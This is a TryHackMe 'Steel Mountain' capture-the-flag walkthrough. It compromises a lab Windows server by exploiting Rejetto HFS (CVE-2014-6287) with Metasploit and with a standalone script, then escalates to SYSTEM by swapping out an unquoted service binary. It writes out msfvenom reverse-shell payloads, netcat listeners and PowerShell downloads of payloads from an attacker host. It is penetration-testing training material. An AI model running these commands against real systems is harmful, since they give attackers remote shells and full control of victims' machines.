Apr 2, 2020
TryHackMe: Steel Mountain
[Task 1] Introduction
- Deploy the machine.Who is the employee of the month?
Let’s scan port
nmap -Pn <ip>
Scan services ans OS
nmap -sV -O <ip>
There’re 6 ports and services. OS is Windows Server 2008 R2 -2012
Let’s access port 80
http://<ip>Inspect for resources, source code, and network. Now we have employee of the month.
Fuzzing directories using DirBuster
DirBuster’s result. I tried to access these files an directories, but I couldn’t.
Let’s scan for exploit
nmap --script vuln <ip>
There are vulnerables :
port 80 -> http-vuln-cve2015–1635
port 8080 —> http-vuln-cve2011–3192There are samba ports. Let’s scan with nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>Nothing in the scan result.
[Task 2] Initial Access
1. Scan the machine with nmap. What is the other port running a web server on?
ANS: 8080
2. Take a look at the other web server. What file server is running?
Access website
http://<ip>:8080Inspect the site, nothing so far.
Click at Server Information
It’s HTTP File Server from Rejetto.
Let’s fuzzing directories with DirBuster.
The result is nothing.
3. What is the CVE number to exploit this file server?
Access exploit-db.com
https://www.exploit-db.com/search for rejetto, click first one
4. Use Metasploit to get an initial shell. What is the user flag?
msfconsolesearch 2014-6287
use 0show options
set RHOSTS <target ip>set RPORT 8080run
getsystemmigrate
It failed.
cd /Usersls
cd billls
cd Desktopls
cat user.txt
[Task 3] Privilege Escalation
- Upload Script
upload <path>
ls 
load powershellpowershell_shell
. .\Powerup.ps1Invoke-Allchecks
2. Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?
3. The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!
Let’s note the path first
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exeUse msfvenom to generate a reverse shell as an Windows executable.
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
Back to metasploit, create listening session
use multi/handlerset LHOST <attacker ip>set LPORT <attacker port>
Back to my old session, in my case it’s #3
sessions 3
upload our exploit
upload /root/Desktop/ASCService.exeStop the service
shellsc stop AdvancedSystemCareService9
Copy file
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Start malicious service
sc start AdvancedSystemCareService9Now, I only have 30 seconds to migrate to admin, if I waste my time session will die and I have to redo the steps again.
For me, I’ve done these steps about 5 times until I can get shell.
list process
psMigrate to lsass.exe, In my case it’s 648
migrate 648getsystem
cd /Users/Administrator/Desktoplscat root.txt
[Task 4] Access and Escalation Without Metasploit
- Save script from https://www.exploit-db.com/exploits/39161
Edit local IP and port
Create HTTP Server
python -m SimpleHTTPServer 80
Create listener
nc -lvp 4444
Run the exploit
python rejetto.py <ip> 8080
Let’s see at HTTP Server
Edit ncat.exe to nc.exe
mv ncat.exe nc.exe
Run python command again
python rejetto.py <ip> 8080
Back to listener, now I have shell
2. Check for system version
systeminfo
Get winPEAS
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"
Verify the file
dir
Run winPEAS.exe
winPEAS.exe
Note the unquoted path
AdvancedSystemCareService9C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
For manually listing services
powershell -c "Get-Service"
ANS: powershell -c “Get-Service”
4. Exploitation
Go to the path
cd \Program Files (x86)\IObit\Advanced SystemCareBack to attacker’s machine, create msfvenom payload
Reference: https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe
Create listener on port 1234
nc -lvp 1234
Back to victim’s machine, stop service
sc stop AdvancedSystemCareService9
Backup ASCService.exe
rename ASCService.exe ASCService_bak.exe
Download our payload
powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.8.3.50/ASCService.exe"
Start service
sc start AdvancedSystemCareService9Now I have shell.
